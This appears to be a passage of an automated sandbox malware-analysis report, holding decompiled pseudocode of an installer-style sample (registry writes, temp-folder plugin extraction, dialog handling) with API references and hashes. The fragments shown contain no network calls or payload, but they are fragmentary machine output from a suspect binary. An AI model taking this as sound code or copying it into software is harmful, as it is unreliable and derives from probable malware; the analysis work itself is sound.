                                                				_t29 = E00402D84(3);
                                                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                				 *(_t64 - 0x18) = _t29;
                                                				_t30 = E00402D84(4);
                                                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                				 *(_t64 + 8) = _t30;
                                                				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                				}
                                                				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                					 *(_t64 + 8) = E00402DA6(0x44);
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                				_push(1);
                                                				if(__eflags != 0) {
                                                					_t61 = E00402DA6();
                                                					_t32 = E00402DA6();
                                                					asm("sbb ecx, ecx");
                                                					asm("sbb eax, eax");
                                                					_t35 =  ~( *_t31) & _t61;
                                                					__eflags = _t35;
                                                					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                					goto L10;
                                                				} else {
                                                					_t63 = E00402D84();
                                                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                					_t41 = E00402D84(2);
                                                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                					_t56 =  *(_t64 - 0x1c) >> 2;
                                                					if(__eflags == 0) {
                                                						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                						L10:
                                                						 *(_t64 - 0x38) = _t36;
                                                					} else {
                                                						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                						asm("sbb eax, eax");
                                                						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                					}
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                					_push( *(_t64 - 0x38));
                                                					E00406484();
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                				return 0;
                                                			}















                                                0x00401c43
                                                0x00401c45
                                                0x00401c4c
                                                0x00401c4f
                                                0x00401c52
                                                0x00401c5c
                                                0x00401c60
                                                0x00401c63
                                                0x00401c6c
                                                0x00401c6c
                                                0x00401c6f
                                                0x00401c73
                                                0x00401c7c
                                                0x00401c7c
                                                0x00401c7f
                                                0x00401c83
                                                0x00401c85
                                                0x00401cda
                                                0x00401cdc
                                                0x00401ce7
                                                0x00401cf1
                                                0x00401cf4
                                                0x00401cf4
                                                0x00401cfd
                                                0x00000000
                                                0x00401c87
                                                0x00401c8e
                                                0x00401c90
                                                0x00401c93
                                                0x00401c99
                                                0x00401ca0
                                                0x00401ca3
                                                0x00401ccb
                                                0x00401d03
                                                0x00401d03
                                                0x00401ca5
                                                0x00401cb3
                                                0x00401cbb
                                                0x00401cbe
                                                0x00401cbe
                                                0x00401ca3
                                                0x00401d06
                                                0x00401d09
                                                0x00401d0f
                                                0x00402ba4
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                				char _v68;
                                                				char _v132;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t23;
                                                				signed int _t24;
                                                				void* _t31;
                                                				void* _t33;
                                                				void* _t34;
                                                				void* _t44;
                                                				signed int _t46;
                                                				signed int _t50;
                                                				signed int _t52;
                                                				signed int _t53;
                                                				signed int _t55;
                                                
                                                				_t23 = _a16;
                                                				_t53 = _a12;
                                                				_t44 = 0xffffffdc;
                                                				if(_t23 == 0) {
                                                					_push(0x14);
                                                					_pop(0);
                                                					_t24 = _t53;
                                                					if(_t53 < 0x100000) {
                                                						_push(0xa);
                                                						_pop(0);
                                                						_t44 = 0xffffffdd;
                                                					}
                                                					if(_t53 < 0x400) {
                                                						_t44 = 0xffffffde;
                                                					}
                                                					if(_t53 < 0xffff3333) {
                                                						_t52 = 0x14;
                                                						asm("cdq");
                                                						_t24 = 1 / _t52 + _t53;
                                                					}
                                                					_t25 = _t24 & 0x00ffffff;
                                                					_t55 = _t24 >> 0;
                                                					_t46 = 0xa;
                                                					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                				} else {
                                                					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                					_t50 = 0;
                                                				}
                                                				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                                                				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                                				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                                			}



















                                                0x00404d4f
                                                0x00404d54
                                                0x00404d5c
                                                0x00404d5d
                                                0x00404d6a
                                                0x00404d72
                                                0x00404d73
                                                0x00404d75
                                                0x00404d77
                                                0x00404d79
                                                0x00404d7c
                                                0x00404d7c
                                                0x00404d83
                                                0x00404d89
                                                0x00404d89
                                                0x00404d90
                                                0x00404d97
                                                0x00404d9a
                                                0x00404d9d
                                                0x00404d9d
                                                0x00404da1
                                                0x00404db1
                                                0x00404db3
                                                0x00404db6
                                                0x00404d5f
                                                0x00404d5f
                                                0x00404d66
                                                0x00404d66
                                                0x00404dbe
                                                0x00404dc9
                                                0x00404ddf
                                                0x00404df0
                                                0x00404e0c

                                                APIs
                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
                                                • wsprintfW.USER32 ref: 00404DF0
                                                • SetDlgItemTextW.USER32 ref: 00404E03
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                				void* _t20;
                                                				void* _t21;
                                                				int _t24;
                                                				int _t30;
                                                				intOrPtr _t33;
                                                				void* _t34;
                                                				intOrPtr _t37;
                                                				void* _t39;
                                                				void* _t42;
                                                
                                                				_t42 = __eflags;
                                                				_t33 = __edx;
                                                				_t30 = __ebx;
                                                				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                				_t34 = __eax;
                                                				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                				 *(_t39 - 0x44) = E00402DA6(2);
                                                				_t20 = E00402DA6(0x11);
                                                				 *(_t39 - 4) = 1;
                                                				_t21 = E00402E36(_t42, _t34, _t20, 2);
                                                				 *(_t39 + 8) = _t21;
                                                				if(_t21 != __ebx) {
                                                					_t24 = 0;
                                                					if(_t37 == 1) {
                                                						E00402DA6(0x23);
                                                						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
                                                					}
                                                					if(_t37 == 4) {
                                                						 *0x40b5f0 = E00402D84(3);
                                                						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                						_t24 = _t37;
                                                					}
                                                					if(_t37 == 3) {
                                                						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800);
                                                					}
                                                					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24) == 0) {
                                                						 *(_t39 - 4) = _t30;
                                                					}
                                                					_push( *(_t39 + 8));
                                                					RegCloseKey();
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                				return 0;
                                                			}












                                                0x0040248a
                                                0x0040248a
                                                0x0040248a
                                                0x0040248a
                                                0x0040248d
                                                0x00402494
                                                0x0040249e
                                                0x004024a1
                                                0x004024aa
                                                0x004024b1
                                                0x004024b8
                                                0x004024bb
                                                0x004024c1
                                                0x004024cb
                                                0x004024cf
                                                0x004024da
                                                0x004024da
                                                0x004024e1
                                                0x004024eb
                                                0x004024f1
                                                0x004024f4
                                                0x004024f4
                                                0x004024f8
                                                0x00402504
                                                0x00402504
                                                0x0040251d
                                                0x0040251f
                                                0x0040251f
                                                0x00402522
                                                0x004025fd
                                                0x004025fd
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspDD94.tmp,00000023,00000011,00000002), ref: 004024D5
                                                • RegSetValueExW.ADVAPI32 ref: 00402515
                                                • RegCloseKey.ADVAPI32(?), ref: 004025FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nspDD94.tmp
                                                • API String ID: 2655323295-4034093022
                                                • Opcode ID: a042c767b6986487cf95de5ddc7f1c8febd38642eeecd0575e21ea379906e559
                                                • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                • Opcode Fuzzy Hash: a042c767b6986487cf95de5ddc7f1c8febd38642eeecd0575e21ea379906e559
                                                • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E00405E0C(WCHAR* _a4) {
                                                				WCHAR* _t9;
                                                
                                                				_t9 = _a4;
                                                				_push( &(_t9[lstrlenW(_t9)]));
                                                				_push(_t9);
                                                				if( *(CharPrevW()) != 0x5c) {
                                                					lstrcatW(_t9, 0x40a014);
                                                				}
                                                				return _t9;
                                                			}




                                                0x00405e0d
                                                0x00405e1a
                                                0x00405e1b
                                                0x00405e26
                                                0x00405e2e
                                                0x00405e2e
                                                0x00405e36

                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                • CharPrevW.USER32(?,00000000), ref: 00405E1C
                                                • lstrcatW.KERNEL32 ref: 00405E2E
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-4017390910
                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E732810E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                				void* _v0;
                                                				void* _t27;
                                                				signed int _t29;
                                                				void* _t30;
                                                				void* _t34;
                                                				void* _t36;
                                                				void* _t38;
                                                				void* _t40;
                                                				void* _t48;
                                                				void* _t54;
                                                				void* _t63;
                                                				void* _t64;
                                                				signed int _t66;
                                                				void* _t67;
                                                				void* _t73;
                                                				void* _t74;
                                                				void* _t77;
                                                				void* _t80;
                                                				void _t81;
                                                				void _t82;
                                                				intOrPtr _t84;
                                                				void* _t86;
                                                				void* _t88;
                                                
                                                				 *0x7328506c = _a8;
                                                				 *0x73285070 = _a16;
                                                				 *0x73285074 = _a12;
                                                				_a12( *0x73285048, E73281651, _t73);
                                                				_t66 =  *0x7328506c +  *0x7328506c * 4 << 3;
                                                				_t27 = E732812E3();
                                                				_v0 = _t27;
                                                				_t74 = _t27;
                                                				if( *_t27 == 0) {
                                                					L28:
                                                					return GlobalFree(_t27);
                                                				}
                                                				do {
                                                					_t29 =  *_t74 & 0x0000ffff;
                                                					_t67 = 2;
                                                					_t74 = _t74 + _t67;
                                                					_t88 = _t29 - 0x66;
                                                					if(_t88 > 0) {
                                                						_t30 = _t29 - 0x6c;
                                                						if(_t30 == 0) {
                                                							L23:
                                                							_t31 =  *0x73285040;
                                                							if( *0x73285040 == 0) {
                                                								goto L26;
                                                							}
                                                							E73281603( *0x73285074, _t31 + 4, _t66);
                                                							_t34 =  *0x73285040;
                                                							_t86 = _t86 + 0xc;
                                                							 *0x73285040 =  *_t34;
                                                							L25:
                                                							GlobalFree(_t34);
                                                							goto L26;
                                                						}
                                                						_t36 = _t30 - 4;
                                                						if(_t36 == 0) {
                                                							L13:
                                                							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                							_t74 = _t74 + _t67;
                                                							_t34 = E73281312(E7328135A(_t38));
                                                							L14:
                                                							goto L25;
                                                						}
                                                						_t40 = _t36 - _t67;
                                                						if(_t40 == 0) {
                                                							L11:
                                                							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                							_t74 = _t74 + _t67;
                                                							_t34 = E73281381(_t80, E732812E3());
                                                							goto L14;
                                                						}
                                                						L8:
                                                						if(_t40 == 1) {
                                                							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                							_t10 = _t81 + 4; // 0x4
                                                							E73281603(_t10,  *0x73285074, _t66);
                                                							_t86 = _t86 + 0xc;
                                                							 *_t81 =  *0x73285040;
                                                							 *0x73285040 = _t81;
                                                						}
                                                						goto L26;
                                                					}
                                                					if(_t88 == 0) {
                                                						_t48 =  *0x73285070;
                                                						_t77 =  *_t48;
                                                						 *_t48 =  *_t77;
                                                						_t49 = _v0;
                                                						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                							E73281603(_t49, _t77 + 8, 0x38);
                                                							_t86 = _t86 + 0xc;
                                                						}
                                                						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                						GlobalFree(_t77);
                                                						goto L26;
                                                					}
                                                					_t54 = _t29 - 0x46;
                                                					if(_t54 == 0) {
                                                						_t82 = GlobalAlloc(0x40,  *0x7328506c +  *0x7328506c + 8);
                                                						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                						_t14 = _t82 + 8; // 0x8
                                                						E73281603(_t14, _v0, 0x38);
                                                						_t86 = _t86 + 0xc;
                                                						 *_t82 =  *( *0x73285070);
                                                						 *( *0x73285070) = _t82;
                                                						goto L26;
                                                					}
                                                					_t63 = _t54 - 6;
                                                					if(_t63 == 0) {
                                                						goto L23;
                                                					}
                                                					_t64 = _t63 - 4;
                                                					if(_t64 == 0) {
                                                						 *_t74 =  *_t74 + 0xa;
                                                						goto L13;
                                                					}
                                                					_t40 = _t64 - _t67;
                                                					if(_t40 == 0) {
                                                						 *_t74 =  *_t74 + 0xa;
                                                						goto L11;
                                                					}
                                                					goto L8;
                                                					L26:
                                                				} while ( *_t74 != 0);
                                                				_t27 = _v0;
                                                				goto L28;
                                                			}


























                                                0x732810eb
                                                0x73281100
                                                0x73281109
                                                0x7328110e
                                                0x73281119
                                                0x7328111c
                                                0x73281125
                                                0x73281129
                                                0x7328112b
                                                0x732812b0
                                                0x732812ba
                                                0x732812ba
                                                0x73281132
                                                0x73281132
                                                0x73281137
                                                0x73281138
                                                0x7328113a
                                                0x7328113d
                                                0x73281256
                                                0x73281259
                                                0x73281271
                                                0x73281271
                                                0x73281278
                                                0x00000000
                                                0x00000000
                                                0x73281285
                                                0x7328128a
                                                0x7328128f
                                                0x73281294
                                                0x7328129a
                                                0x7328129b
                                                0x00000000
                                                0x7328129b
                                                0x7328125b
                                                0x7328125e
                                                0x732811bc
                                                0x732811bf
                                                0x732811c2
                                                0x732811cb
                                                0x732811d0
                                                0x00000000
                                                0x732811d1
                                                0x73281264
                                                0x73281266
                                                0x732811a2
                                                0x732811a5
                                                0x732811a8
                                                0x732811b1
                                                0x00000000
                                                0x732811b1
                                                0x73281164
                                                0x73281165
                                                0x73281177
                                                0x73281180
                                                0x73281184
                                                0x7328118e
                                                0x73281191
                                                0x73281193
                                                0x73281193
                                                0x00000000
                                                0x73281165
                                                0x73281143
                                                0x73281218
                                                0x7328121d
                                                0x73281221
                                                0x73281223
                                                0x7328122c
                                                0x7328122f
                                                0x73281238
                                                0x7328123d
                                                0x7328123d
                                                0x73281247
                                                0x7328124a
                                                0x00000000
                                                0x73281250
                                                0x73281149
                                                0x7328114c
                                                0x732811e9
                                                0x732811ed
                                                0x732811f7
                                                0x732811fb
                                                0x73281205
                                                0x7328120a
                                                0x73281211
                                                0x00000000
                                                0x73281211
                                                0x73281152
                                                0x73281155
                                                0x00000000
                                                0x00000000
                                                0x7328115b
                                                0x7328115e
                                                0x732811b8
                                                0x00000000
                                                0x732811b8
                                                0x73281160
                                                0x73281162
                                                0x7328119e
                                                0x00000000
                                                0x7328119e
                                                0x00000000
                                                0x732812a1
                                                0x732812a1
                                                0x732812ab
                                                0x00000000

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 73281171
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 732811E3
                                                • GlobalFree.KERNEL32 ref: 7328124A
                                                • GlobalFree.KERNEL32(?), ref: 7328129B
                                                • GlobalFree.KERNEL32(00000000), ref: 732812B1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680334815.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000004.00000002.680330419.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680339813.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680344167.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: b30f8b16a9929c06682517c255e62fc699cd63c29608cb870f802680e8e0e983
                                                • Instruction ID: 2b7ff6cefeae060417f7d1f7aee24ae4471fa8e3051e53f7a67dcec46da4f5de
                                                • Opcode Fuzzy Hash: b30f8b16a9929c06682517c255e62fc699cd63c29608cb870f802680e8e0e983
                                                • Instruction Fuzzy Hash: 8E519BB6A00322DFE700DF69C848BE677F8EB08715B248119E94ADB2D4E775B990DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                				signed int _t14;
                                                				int _t17;
                                                				void* _t24;
                                                				intOrPtr* _t29;
                                                				void* _t31;
                                                				signed int _t32;
                                                				void* _t35;
                                                				void* _t40;
                                                				signed int _t42;
                                                
                                                				_t29 = __edi;
                                                				_t24 = __ebx;
                                                				_t14 =  *(_t35 - 0x28);
                                                				_t40 = __edx - 0x38;
                                                				 *(_t35 - 0x10) = _t14;
                                                				_t27 = 0 | _t40 == 0x00000000;
                                                				_t32 = _t40 == 0;
                                                				if(_t14 == __ebx) {
                                                					if(__edx != 0x38) {
                                                						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                					} else {
                                                						E00402DA6(0x21);
                                                						E0040655F("C:\Users\Albus\AppData\Local\Temp\nspDD94.tmp", "C:\Users\Albus\AppData\Local\Temp\nspDD94.tmp\System.dll", 0x400);
                                                						_t17 = lstrlenA("C:\Users\Albus\AppData\Local\Temp\nspDD94.tmp\System.dll");
                                                					}
                                                				} else {
                                                					E00402D84(1);
                                                					 *0x40adf0 = __ax;
                                                					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                				}
                                                				 *(_t35 + 8) = _t17;
                                                				if( *_t29 == _t24) {
                                                					L13:
                                                					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                				} else {
                                                					_t31 = E0040649D(_t27, _t29);
                                                					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
                                                						_t14 = E004060DF(_t31, "C:\Users\Albus\AppData\Local\Temp\nspDD94.tmp\System.dll",  *(_t35 + 8));
                                                						_t42 = _t14;
                                                						if(_t42 == 0) {
                                                							goto L13;
                                                						}
                                                					} else {
                                                						goto L13;
                                                					}
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}












                                                0x0040263e
                                                0x0040263e
                                                0x0040263e
                                                0x00402643
                                                0x00402646
                                                0x00402649
                                                0x0040264e
                                                0x00402650
                                                0x00402670
                                                0x004026aa
                                                0x00402672
                                                0x00402674
                                                0x00402688
                                                0x00402695
                                                0x00402695
                                                0x00402652
                                                0x00402654
                                                0x00402659
                                                0x00402667
                                                0x0040266a
                                                0x004026af
                                                0x004026b2
                                                0x0040292e
                                                0x0040292e
                                                0x004026b8
                                                0x004026c1
                                                0x004026c3
                                                0x004026e2
                                                0x004015b4
                                                0x004015b6
                                                0x00000000
                                                0x004015bc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004026c3
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll), ref: 00402695
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nspDD94.tmp$C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll
                                                • API String ID: 1659193697-3170715615
                                                • Opcode ID: 055331aa1ecea8bfcda913bd06822b13da84f48a5f1a47c8ed214fd280e803f9
                                                • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                • Opcode Fuzzy Hash: 055331aa1ecea8bfcda913bd06822b13da84f48a5f1a47c8ed214fd280e803f9
                                                • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403019(intOrPtr _a4) {
                                                				long _t2;
                                                				struct HWND__* _t3;
                                                				struct HWND__* _t6;
                                                
                                                				if(_a4 == 0) {
                                                					if( *0x42aa20 == 0) {
                                                						_t2 = GetTickCount();
                                                						if(_t2 >  *0x434f0c) {
                                                							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                                                							 *0x42aa20 = _t3;
                                                							return ShowWindow(_t3, 5);
                                                						}
                                                						return _t2;
                                                					} else {
                                                						return E00406946(0);
                                                					}
                                                				} else {
                                                					_t6 =  *0x42aa20;
                                                					if(_t6 != 0) {
                                                						_t6 = DestroyWindow(_t6);
                                                					}
                                                					 *0x42aa20 = 0;
                                                					return _t6;
                                                				}
                                                			}






                                                0x00403020
                                                0x00403040
                                                0x0040304a
                                                0x00403056
                                                0x00403067
                                                0x00403070
                                                0x00000000
